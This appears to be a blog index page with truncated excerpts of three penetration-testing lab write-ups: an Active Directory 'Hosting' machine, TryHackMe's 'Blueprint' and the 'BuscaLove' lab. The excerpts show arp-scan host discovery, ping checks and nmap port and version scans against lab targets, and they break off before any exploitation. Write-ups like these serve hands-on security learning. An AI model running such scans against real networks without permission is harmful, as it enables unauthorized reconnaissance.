HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

Blue Print

Image
BLUEPRINT I’m going to do the resolution of Easy Level from Tryhackme called Blueprint which is so easy to do. Firstly; we have to open a new Shell terminal in our virtual machine and we have to execute this command you can see in the picture below which we'll be able to do the port scans. In addition, as we know the open ports we’re going to use this param  -A ( user scripts from Nmap to look at vulnerabilities)  and  sV  which it will give if it’s possible versions in each ports you want to analyze in the four pictures you can observe below. In addition, as we know the open ports we’re going to use this param  -A ( user scripts from Nmap to look at vulnerabilities)  and  sV  which it will give if it’s possible versions in each ports you want to analyze in the four pictures you can observe below. Now as I´ve verify in the 80 port when I introduce IP Address from victim machine I get it a mistake. But 8080 port in the screenshots the nmap script...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »